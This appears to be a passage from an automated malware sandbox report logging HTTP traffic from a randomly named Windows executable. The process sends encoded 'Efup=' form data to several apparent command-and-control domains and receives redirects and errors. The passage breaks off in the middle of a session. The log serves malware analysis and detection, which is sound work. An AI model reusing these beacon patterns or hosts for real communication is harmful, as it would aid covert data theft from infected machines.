                                Jul 3, 2024 18:04:13.450201035 CEST650OUTPOST /wwqg/ HTTP/1.1
                                Host: www.herplaatsingscoach.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.herplaatsingscoach.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 225
                                Referer: http://www.herplaatsingscoach.com/wwqg/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 52 4e 2b 68 49 52 7a 49 48 6f 6f 64 46 32 53 44 4b 39 7a 58 42 75 6d 70 77 4c 4c 49 73 39 74 4d 4b 65 7a 6f 43 6d 62 41 41 41 47 64 34 36 69 76 38 74 6b 75 37 33 7a 6d 31 32 68 2b 32 59 57 36 70 62 66 52 6f 39 41 51 6d 63 41 64 45 47 31 5a 46 31 50 6f 43 4d 34 65 6c 66 67 41 62 63 67 58 75 32 37 65 5a 77 69 31 77 43 6e 35 42 46 49 38 58 47 4e 70 50 2b 73 7a 67 51 2f 4f 56 73 2f 2f 36 42 6a 45 54 79 57 54 47 64 53 76 49 53 69 37 56 4b 41 57 4e 51 65 67 36 61 32 6f 73 65 61 35 46 66 68 4d 38 77 38 54 63 4f 30 42 64 4f 70 52 64 5a 75 61 72 37 6d 6b 4f 53 30 38 73 38 6f 68 58 38 64 6e 63 38 69 34 35 76 73 4e 6a 41 35 36 4b 43 59 5a 33 6c 79 48 4f 57 53 6d
                                Data Ascii: Efup=RN+hIRzIHoodF2SDK9zXBumpwLLIs9tMKezoCmbAAAGd46iv8tku73zm12h+2YW6pbfRo9AQmcAdEG1ZF1PoCM4elfgAbcgXu27eZwi1wCn5BFI8XGNpP+szgQ/OVs//6BjETyWTGdSvISi7VKAWNQeg6a2osea5FfhM8w8TcO0BdOpRdZuar7mkOS08s8ohX8dnc8i45vsNjA56KCYZ3lyHOWSm
                                Jul 3, 2024 18:04:14.093307972 CEST300INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Wed, 03 Jul 2024 16:04:14 GMT
                                Content-Type: text/plain
                                Content-Length: 24
                                Connection: close
                                Location: https://www.herplaatsingscoach.com/wwqg/
                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                X-Proxy-Cache-Info: DT:1
                                Data Raw: 33 30 31 20 2d 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a
                                Data Ascii: 301 - Moved Permanently


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                15192.168.2.84972935.214.213.30805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:15.981758118 CEST1667OUTPOST /wwqg/ HTTP/1.1
                                Host: www.herplaatsingscoach.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.herplaatsingscoach.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 1241
                                Referer: http://www.herplaatsingscoach.com/wwqg/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 52 4e 2b 68 49 52 7a 49 48 6f 6f 64 46 32 53 44 4b 39 7a 58 42 75 6d 70 77 4c 4c 49 73 39 74 4d 4b 65 7a 6f 43 6d 62 41 41 41 65 64 35 49 61 76 38 4d 6b 75 36 33 7a 6d 38 57 68 7a 32 59 57 64 70 62 48 64 6f 39 4e 72 6d 61 45 64 45 67 35 5a 53 55 50 6f 5a 63 34 65 73 2f 67 64 66 63 68 54 75 32 72 43 5a 30 4f 31 77 43 6e 35 42 44 73 38 65 33 4e 70 4a 2b 73 79 77 41 2f 53 65 4d 2b 61 36 48 4c 79 54 79 53 70 42 70 65 76 49 7a 65 37 58 63 55 57 42 51 65 75 71 4b 32 4b 73 65 48 37 46 65 4e 49 38 78 34 39 63 4a 59 42 66 4c 59 50 50 59 66 47 39 36 47 6c 58 42 38 49 72 74 41 53 64 39 56 50 66 4e 4b 31 78 4c 34 41 30 77 68 4c 50 51 4d 54 31 45 75 58 4f 68 4c 4c 39 6d 53 57 63 4e 32 73 74 50 41 46 46 37 43 53 78 73 4f 6d 42 35 6a 48 63 46 46 72 57 71 53 2b 6c 68 7a 6a 70 79 73 68 77 6f 58 72 46 57 70 7a 50 56 52 41 53 2f 4e 6b 4d 75 52 6d 68 48 47 67 47 46 30 55 42 73 53 70 53 41 32 2b 56 35 53 53 79 67 55 78 41 36 38 2f 58 54 7a 6e 55 39 56 66 63 55 46 33 56 58 5a 30 69 4b 54 4f 77 76 48 7a 32 [TRUNCATED]
                                Data Ascii: Efup=RN+hIRzIHoodF2SDK9zXBumpwLLIs9tMKezoCmbAAAed5Iav8Mku63zm8Whz2YWdpbHdo9NrmaEdEg5ZSUPoZc4es/gdfchTu2rCZ0O1wCn5BDs8e3NpJ+sywA/SeM+a6HLyTySpBpevIze7XcUWBQeuqK2KseH7FeNI8x49cJYBfLYPPYfG96GlXB8IrtASd9VPfNK1xL4A0whLPQMT1EuXOhLL9mSWcN2stPAFF7CSxsOmB5jHcFFrWqS+lhzjpyshwoXrFWpzPVRAS/NkMuRmhHGgGF0UBsSpSA2+V5SSygUxA68/XTznU9VfcUF3VXZ0iKTOwvHz2ND1Ln8ZqmQw8+bX3PloFkRgBESs8C9sEDB8vohH3ludEq+fSuUklK7jT8pl6HEMpHmyoMKo1zAnrL2HqNp2OeoqJ1esMTSOT0AqKyN6Z6VfW9Q6iaQeHQ1od+KnciuCaay/Sst2UnFKOtphi+7Z40iRlTraJMo6yl6N3K1Amfx8rsm9Br7DQZgdsWUIEyFqmwMa2gecNrxfKJC3M7Ge8qA0tTEVWA2tom8/ZtP+mf/8STGe3k1MBfakwNDsSjs1g0Fl1ViJlp2zpgyEALOnSOkBnn5aWM/XgyeeF+Mo3jpVhRthZ2o7LeUCvnkU+wof05SqR+yVlkMkWYwHzfeob33NoKwIQ6Ue3lQw9uY8VfrrlDWQl+52ow9EG1T9QHyxOdyFeIxAvFsACwdpLeXUynkK/3N49Q6h8oIo3+9MPcK7q3O4xmCHgF4cJG6MMQwqrbcPuzRMKEdHBIO0XlquqNO+J68nfgDBFTV2L7TX/CwT7vK9KTx4deQD5An0XxWBgcmOo4CFAuw4R7IjTKjLoP1jVZ3TRpc19L/f+2X2fo080O45Sloeod/8uTp512nkL/yIhHzZ7L1ALjymyYOt7yWDaOrirAueKEuAYPnEACCzaq22IwYw06RPkuesJnzCjnV0h9bBS2kee42cRfpsD7VeQkNWrT3l5sb [TRUNCATED]
                                Jul 3, 2024 18:04:16.609276056 CEST300INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Wed, 03 Jul 2024 16:04:16 GMT
                                Content-Type: text/plain
                                Content-Length: 24
                                Connection: close
                                Location: https://www.herplaatsingscoach.com/wwqg/
                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                X-Proxy-Cache-Info: DT:1
                                Data Raw: 33 30 31 20 2d 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a
                                Data Ascii: 301 - Moved Permanently


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                16192.168.2.84973035.214.213.30805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:18.518006086 CEST354OUTGET /wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiXOWq2hFnbSrpYq5tfQM8qwnGlhpBH7wUMA2rqYfQo8R+3WIcA6o0TPRBDA7dTlRc+xV9X/9AN+Ulg==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.herplaatsingscoach.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Jul 3, 2024 18:04:19.137834072 CEST450INHTTP/1.1 301 Moved Permanently
                                Server: nginx
                                Date: Wed, 03 Jul 2024 16:04:19 GMT
                                Content-Type: text/plain
                                Content-Length: 24
                                Connection: close
                                Location: https://www.herplaatsingscoach.com/wwqg/?Efup=cPWBLmqfYdwFLm3BEseWSNTw863lhs9YSZmOJUbUOjzc/4eC4u1GiXOWq2hFnbSrpYq5tfQM8qwnGlhpBH7wUMA2rqYfQo8R+3WIcA6o0TPRBDA7dTlRc+xV9X/9AN+Ulg==&5X=Wrl4wnYP
                                Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                X-Proxy-Cache-Info: DT:1
                                Data Raw: 33 30 31 20 2d 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0a
                                Data Ascii: 301 - Moved Permanently


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                17192.168.2.849731104.21.10.169805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:32.252095938 CEST600OUTPOST /kyls/ HTTP/1.1
                                Host: www.aotuqiye.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.aotuqiye.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 205
                                Referer: http://www.aotuqiye.com/kyls/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 6d 44 43 6b 6e 69 77 63 46 38 62 53 79 30 6b 4d 77 6a 4e 42 43 50 59 2b 6b 76 68 6a 38 55 76 65 6e 41 72 37 54 66 2b 59 67 35 56 38 67 48 67 6c 41 33 52 6b 48 55 45 6d 46 6e 58 38 65 6b 68 43 43 69 67 7a 4e 73 47 48 6c 58 50 37 30 63 63 55 75 69 50 6d 34 49 39 42 37 41 32 38 67 72 73 34 70 56 72 69 75 47 2f 51 4e 6b 71 45 72 4b 69 36 36 73 77 35 73 71 72 6b 42 6f 58 4c 6d 55 7a 31 36 65 66 4a 48 63 32 4b 76 71 39 4d 41 64 34 57 4e 38 2b 44 72 35 6e 4f 66 6b 68 69 65 66 2b 41 32 38 6f 4e 41 6e 37 68 61 7a 4f 4e 74 6c 51 69 65 51 33 4f 52 67 7a 65 61 70 2b 41 61 4a 61 45 6d 39 77 69 72 73 51 3d
                                Data Ascii: Efup=mDCkniwcF8bSy0kMwjNBCPY+kvhj8UvenAr7Tf+Yg5V8gHglA3RkHUEmFnX8ekhCCigzNsGHlXP70ccUuiPm4I9B7A28grs4pVriuG/QNkqErKi66sw5sqrkBoXLmUz16efJHc2Kvq9MAd4WN8+Dr5nOfkhief+A28oNAn7hazONtlQieQ3ORgzeap+AaJaEm9wirsQ=
                                Jul 3, 2024 18:04:32.831449986 CEST544INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:04:32 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y6pxFABqXtxJvrONqvuFsVsaSJzrV1xD8nqLaLYsZb4ERPT%2FMkBHOokIu1qdhuw%2Bzm2BEL1LNAqq4TKNX15qK%2BwqlRXyQfByJrVWF6wQPlAZCn8HMtJ062jrSuz0RweJyd2g"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89d81ca8195842d5-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                18192.168.2.849732104.21.10.169805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:34.777998924 CEST620OUTPOST /kyls/ HTTP/1.1
                                Host: www.aotuqiye.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.aotuqiye.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 225
                                Referer: http://www.aotuqiye.com/kyls/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 6d 44 43 6b 6e 69 77 63 46 38 62 53 67 48 38 4d 78 45 35 42 44 76 59 35 34 66 68 6a 31 30 76 61 6e 42 58 37 54 66 57 32 67 50 46 38 67 6d 38 6c 42 79 6c 6b 41 55 45 6d 63 58 58 35 42 30 67 76 43 69 63 52 4e 75 53 48 6c 55 7a 37 30 63 4d 55 76 56 62 35 35 59 39 50 33 67 32 2b 74 4c 73 34 70 56 72 69 75 47 62 36 4e 67 2b 45 72 36 53 36 34 4e 77 6d 79 61 72 6c 57 59 58 4c 78 45 7a 50 36 65 65 6d 48 64 36 6b 76 73 35 4d 41 63 49 57 4b 74 2b 43 6c 35 6e 79 51 45 68 78 51 4d 44 63 39 73 63 31 45 48 58 36 45 31 47 77 68 7a 39 49 45 79 2f 49 53 67 62 31 61 71 57 32 66 2b 48 73 38 65 67 53 31 37 46 6c 39 37 45 65 62 79 66 56 6a 59 76 57 5a 42 6b 4f 6b 6f 4f 70
                                Data Ascii: Efup=mDCkniwcF8bSgH8MxE5BDvY54fhj10vanBX7TfW2gPF8gm8lBylkAUEmcXX5B0gvCicRNuSHlUz70cMUvVb55Y9P3g2+tLs4pVriuGb6Ng+Er6S64NwmyarlWYXLxEzP6eemHd6kvs5MAcIWKt+Cl5nyQEhxQMDc9sc1EHX6E1Gwhz9IEy/ISgb1aqW2f+Hs8egS17Fl97EebyfVjYvWZBkOkoOp


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                19192.168.2.849733104.21.10.169805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:37.310643911 CEST1637OUTPOST /kyls/ HTTP/1.1
                                Host: www.aotuqiye.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.aotuqiye.com
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 1241
                                Referer: http://www.aotuqiye.com/kyls/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 6d 44 43 6b 6e 69 77 63 46 38 62 53 67 48 38 4d 78 45 35 42 44 76 59 35 34 66 68 6a 31 30 76 61 6e 42 58 37 54 66 57 32 67 50 4e 38 6a 55 30 6c 41 56 35 6b 42 55 45 6d 44 6e 58 34 42 30 67 58 43 69 45 56 4e 75 65 39 6c 52 33 37 31 2f 55 55 6f 6b 62 35 7a 59 39 50 2f 41 32 7a 67 72 73 70 70 56 36 72 75 47 72 36 4e 67 2b 45 72 38 2b 36 75 4d 77 6d 77 61 72 6b 42 6f 57 5a 6d 55 79 42 36 66 33 52 48 64 2b 61 36 4d 5a 4d 41 38 59 57 49 66 47 43 36 4a 6e 4b 58 45 67 73 51 4d 50 31 39 74 77 35 45 48 54 45 45 79 43 77 68 79 41 56 41 32 79 55 42 6a 66 44 46 49 50 64 63 35 4c 68 33 34 67 38 2f 71 74 43 36 73 52 31 63 67 6a 44 72 4b 4f 68 49 33 73 6e 70 34 66 33 6e 6e 42 4d 43 4b 2f 47 55 4f 6e 34 35 6e 61 6b 33 42 74 41 77 44 68 53 73 4c 64 69 79 35 45 38 59 66 42 2b 73 33 62 59 2b 7a 6a 39 34 4a 30 70 55 6b 4b 63 41 46 2f 4a 55 72 37 65 66 6a 57 46 70 6d 39 49 2f 7a 44 37 59 35 69 63 31 63 6c 54 37 47 34 31 6d 63 63 69 6a 71 4a 53 70 54 4e 79 6b 77 36 65 71 32 65 51 68 72 56 4c 58 33 5a 4b 73 [TRUNCATED]
                                Data Ascii: Efup=mDCkniwcF8bSgH8MxE5BDvY54fhj10vanBX7TfW2gPN8jU0lAV5kBUEmDnX4B0gXCiEVNue9lR371/UUokb5zY9P/A2zgrsppV6ruGr6Ng+Er8+6uMwmwarkBoWZmUyB6f3RHd+a6MZMA8YWIfGC6JnKXEgsQMP19tw5EHTEEyCwhyAVA2yUBjfDFIPdc5Lh34g8/qtC6sR1cgjDrKOhI3snp4f3nnBMCK/GUOn45nak3BtAwDhSsLdiy5E8YfB+s3bY+zj94J0pUkKcAF/JUr7efjWFpm9I/zD7Y5ic1clT7G41mccijqJSpTNykw6eq2eQhrVLX3ZKsZM/04S3NeVQiiCV9/dtkO8AUFbP7U1pQv8+ZehlLzybD8wcpUJ5sCnWWh8FBqCyUR4LhK4/A8SjqsZRVStmESm3ytnobcek6m8i2LLRAto2xw+O6IlXIKDUweUrZUcVsoQLZ8FfMFhjp6Y21juOtHRrJV5iF4IYK1MoiPTc+fjCONBBBpKS3RFgcFuXkwS8EQjbG+CTDE5nT6HDYmLzpgPWCbKsGi81D0ZDPz9/mIQT+oZZoIC+LIVZdtrM1CP4Orc+6fPdhatVZ1k3AEFMjuCEHFS52lmF9Zgwf+SpAc7nFLlWYTek3ilX1mKc5YJ5t4VOmcDnEPyDUdQ1h20t1pRsENuywmeuZsqvEEEg81qgxPPm+A/1XECwccoe6RGiVmoTHHd7XvX3kDVoQKrD9L67X/dMKCNvwFtMDkw3ZXdyW9hBlTqwd978e7uQd4Wtd5wsppDWOozZ/r3EPQ3VsfdSxckkHRpSUuxeAKwlNZuaRXOU8tiwuAN3Ccq7k5J7wm46uaxXlgMBaJIJmsqU2Ia7OQkN2A/433YwMMeO+KiKSPVRv1qLhaoaraPFaupNMMzCe9DYToXSrPtkD7SDHZrsXsRAMnpfPlBH1DL5Y7Ca9HvJ6dnaumLCHYvd1xlCIzk71JRcj2au1psYv42IJy7c3R00C4tojj/ [TRUNCATED]
                                Jul 3, 2024 18:04:38.084608078 CEST548INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:04:38 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FfI7mwRydcF%2BegD0Ys4E0V89YYV9R24JEdjTNgx2WcyTQJp6CvewaV0QFmT7fTHFFU7nNwjUSt3bPzDblxo0E4kRdpq1zzzf%2F4qVMEEdfg77mllqm%2F%2B8sxqVbyTpCG1nrDoN"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89d81cc7cf8841e0-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                20192.168.2.849734104.21.10.169805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:39.843580008 CEST344OUTGET /kyls/?Efup=rBqEkS5/F5fti2d01GsRL+09s9Yw9GfL+xb/bd6jjd9iqmgZJUglXlxIaQ37OHsjGQRRYNPuqH7W49E+lFfrzONNxRCWpYpdl2nohzXrMm+ut6S054Q8wZKBKIXyn1qR4w==&5X=Wrl4wnYP HTTP/1.1
                                Host: www.aotuqiye.com
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Jul 3, 2024 18:04:40.564845085 CEST542INHTTP/1.1 404 Not Found
                                Date: Wed, 03 Jul 2024 16:04:40 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                CF-Cache-Status: DYNAMIC
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dj9Zn3o4qcGLdsexIOaF0271SkXyAlEP0kR%2BKyI6FKYLSg5b%2B0v4Nr59MVG6TnnFUG7vcLMfnGy94j2g4owQDW2qN01vKHnGo7zTcxFIfyJcAj92EaK2BGilcMjIDlbfbExz"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 89d81cd78da2c329-EWR
                                alt-svc: h3=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                21192.168.2.84973564.190.62.22805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:45.920260906 CEST639OUTPOST /7kq8/ HTTP/1.1
                                Host: www.tutoringservices-jp.space
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.tutoringservices-jp.space
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 205
                                Referer: http://www.tutoringservices-jp.space/7kq8/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 74 76 6b 5a 38 77 61 79 2b 63 51 6a 52 32 75 6b 4b 36 35 6e 33 69 43 62 46 4e 59 53 76 30 59 74 34 6b 74 6e 42 76 4a 36 6c 42 4e 54 36 2f 56 33 2b 66 42 46 4a 6f 45 2b 70 6e 41 54 6a 65 34 74 47 54 43 74 53 35 52 6b 4a 4e 6a 74 69 37 62 6b 76 44 72 61 59 4a 78 33 6f 41 6c 50 38 6f 51 2b 50 44 54 34 57 77 6b 36 48 6e 30 4d 7a 2b 73 73 57 75 6a 46 37 66 72 4b 38 79 75 51 56 6d 33 45 73 77 2b 43 35 72 77 35 6f 77 4e 52 55 50 72 74 72 42 48 74 50 70 78 57 52 33 6c 31 78 2b 66 62 63 32 6e 79 75 73 31 32 32 69 49 34 4c 4d 31 34 32 34 4b 41 59 77 47 46 4e 79 68 4b 38 4c 62 5a 61 6e 4c 37 67 38 59 3d
                                Data Ascii: Efup=tvkZ8way+cQjR2ukK65n3iCbFNYSv0Yt4ktnBvJ6lBNT6/V3+fBFJoE+pnATje4tGTCtS5RkJNjti7bkvDraYJx3oAlP8oQ+PDT4Wwk6Hn0Mz+ssWujF7frK8yuQVm3Esw+C5rw5owNRUPrtrBHtPpxWR3l1x+fbc2nyus122iI4LM1424KAYwGFNyhK8LbZanL7g8Y=
                                Jul 3, 2024 18:04:46.563389063 CEST305INHTTP/1.1 405 Not Allowed
                                date: Wed, 03 Jul 2024 16:04:46 GMT
                                content-type: text/html
                                content-length: 154
                                server: Parking/1.0
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                22192.168.2.84973664.190.62.22805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:48.454025030 CEST659OUTPOST /7kq8/ HTTP/1.1
                                Host: www.tutoringservices-jp.space
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.tutoringservices-jp.space
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 225
                                Referer: http://www.tutoringservices-jp.space/7kq8/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                Data Raw: 45 66 75 70 3d 74 76 6b 5a 38 77 61 79 2b 63 51 6a 51 56 32 6b 5a 62 35 6e 31 43 43 55 4a 74 59 53 67 55 59 70 34 6b 68 6e 42 74 6c 51 6c 30 6c 54 35 62 52 33 39 65 42 46 41 34 45 2b 78 33 41 57 74 2b 34 71 47 54 4f 54 53 35 74 6b 4a 4e 6e 74 69 2b 6e 6b 36 67 44 5a 5a 5a 78 78 67 67 6c 42 7a 49 51 2b 50 44 54 34 57 77 67 45 48 6e 38 4d 7a 4e 30 73 58 4c 58 43 31 2f 72 4e 37 79 75 51 43 57 33 41 73 77 2b 77 35 71 73 66 6f 7a 31 52 55 4b 76 74 72 51 48 73 61 5a 78 51 4f 48 6b 43 31 75 65 50 54 56 76 6e 76 75 30 53 70 77 41 75 4f 36 59 53 73 61 43 47 62 77 75 75 4e 78 4a 38 35 38 47 78 41 45 62 4c 2b 72 4d 38 77 39 6b 4e 33 39 49 55 34 6f 4e 35 71 6f 68 78 4d 4a 35 7a
                                Data Ascii: Efup=tvkZ8way+cQjQV2kZb5n1CCUJtYSgUYp4khnBtlQl0lT5bR39eBFA4E+x3AWt+4qGTOTS5tkJNnti+nk6gDZZZxxgglBzIQ+PDT4WwgEHn8MzN0sXLXC1/rN7yuQCW3Asw+w5qsfoz1RUKvtrQHsaZxQOHkC1uePTVvnvu0SpwAuO6YSsaCGbwuuNxJ858GxAEbL+rM8w9kN39IU4oN5qohxMJ5z
                                Jul 3, 2024 18:04:49.106913090 CEST305INHTTP/1.1 405 Not Allowed
                                date: Wed, 03 Jul 2024 16:04:49 GMT
                                content-type: text/html
                                content-length: 154
                                server: Parking/1.0
                                connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                23192.168.2.84973764.190.62.22805056C:\Program Files (x86)\qmyTqsyASmnirROrrGPUAVVuMokfPsDJosPLtapXkJcNKzqCUrbJkLLlFHKY\ZkqZZBQxQqm.exe
                                TimestampBytes transferredDirectionData
                                Jul 3, 2024 18:04:50.982621908 CEST1676OUTPOST /7kq8/ HTTP/1.1
                                Host: www.tutoringservices-jp.space
                                Accept: */*
                                Accept-Language: en-US,en;q=0.5
                                Accept-Encoding: gzip, deflate
                                Origin: http://www.tutoringservices-jp.space
                                Connection: close
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: no-cache
                                Content-Length: 1241
                                Referer: http://www.tutoringservices-jp.space/7kq8/
                                User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
